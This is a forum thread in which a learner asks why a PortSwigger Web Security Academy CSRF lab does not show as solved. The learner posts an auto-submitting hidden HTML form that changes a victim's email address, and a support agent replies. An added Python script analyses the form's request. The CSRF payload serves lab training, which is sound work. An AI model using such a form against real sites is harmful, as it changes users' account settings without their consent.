
CSRF exercise

rob_stack_attack Aug 02, 2019 12:27AM UTC

I am trying to solve the CSRF exercise/tutorial. I'm new to Burp/PortSwigger. Here is a link to the exercise: https://portswigger.net/web-security/csrf/lab-no-defenses

The solution I came up with is this:

<form method="$POST" action="https://acfd1fc01ec27f6f80b26b810015001d.web-security-academy.net/email">
    <input type="hidden" name="$email" value="$badEmail@bad.com">
</form>
<script>
    document.forms[0].submit();
</script>

After checking to see if it works I am brought back to the fake change email page and I can see the values changed/represented in the URL but the icon that says "unsolved" doesn't change to "solved". Does anyone know what I'm doing wrong?
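The symptom described in the post above (submitted values showing up in the URL) can be reproduced offline by working out which request a browser builds from a form. The following is an added example, not part of the original thread or of PortSwigger's material; `effective_request`, `FormReader` and the `LAB-ID` host are hypothetical names, and reading a leading `$` as a leftover template marker is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode, urlsplit

# Constructed sample in the shape of the form posted above; LAB-ID is a placeholder host.
SAMPLE = """<form method="$POST" action="https://LAB-ID.web-security-academy.net/email">
<input type="hidden" name="$email" value="$badEmail@bad.com"></form>"""

# HTTP-submitting keywords for <form method>, matched ignoring ASCII case.
# The "dialog" keyword sends no request and is out of scope here.
VALID_METHODS = {"get", "post"}


class FormReader(HTMLParser):
    """Collects the first <form>'s attributes and its named <input> fields."""

    def __init__(self):
        super().__init__()
        self.form, self.fields = None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and self.form is None:
            self.form = attrs
        elif tag == "input" and self.form is not None and attrs.get("name"):
            self.fields.append((attrs["name"], attrs.get("value") or ""))


def effective_request(html):
    """Return the request a browser would build when this form is submitted."""
    reader = FormReader()
    reader.feed(html)
    if reader.form is None:
        raise ValueError("no <form> element found")
    declared = reader.form.get("method") or ""
    # A missing or unrecognised method value falls back to GET.
    method = declared.lower() if declared.lower() in VALID_METHODS else "get"
    data = urlencode(reader.fields)  # agrees with browser form encoding on this sample
    url = reader.form.get("action", "")
    notes = []
    if method != declared.lower():
        notes.append(f"method {declared!r} is not a valid keyword; browser uses GET")
    # Assumption: a leading '$' is a leftover template marker, not intended data.
    notes += [f"field name {n!r} starts with '$'" for n, _ in reader.fields if n.startswith("$")]
    if method == "get":
        # GET puts the fields in the query string, replacing any existing query.
        return {"method": "GET", "url": urlsplit(url)._replace(query=data).geturl(), "body": None, "notes": notes}
    return {"method": method.upper(), "url": url, "body": data, "notes": notes}
```

On the sample, the result is a GET request whose query string carries a parameter literally named `$email`, which matches values appearing in the address bar rather than in a POST body.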


Liam Tai-Hogan Aug 02, 2019 12:56PM UTC Support Center agent

Have you followed the steps in the solution?


rob_stack_attack Aug 02, 2019 03:51PM UTC

Yes I have. The steps can be seen in the solution but it's possible I misread something. Keep in mind I am using the community edition but there is nothing in the solution directly for that. The solution simply gives the template and says to fill in the info which I did.

Liam Tai-Hogan Aug 05, 2019 10:20AM UTC Support Center agent

We’ve tested the solution and it works for us.

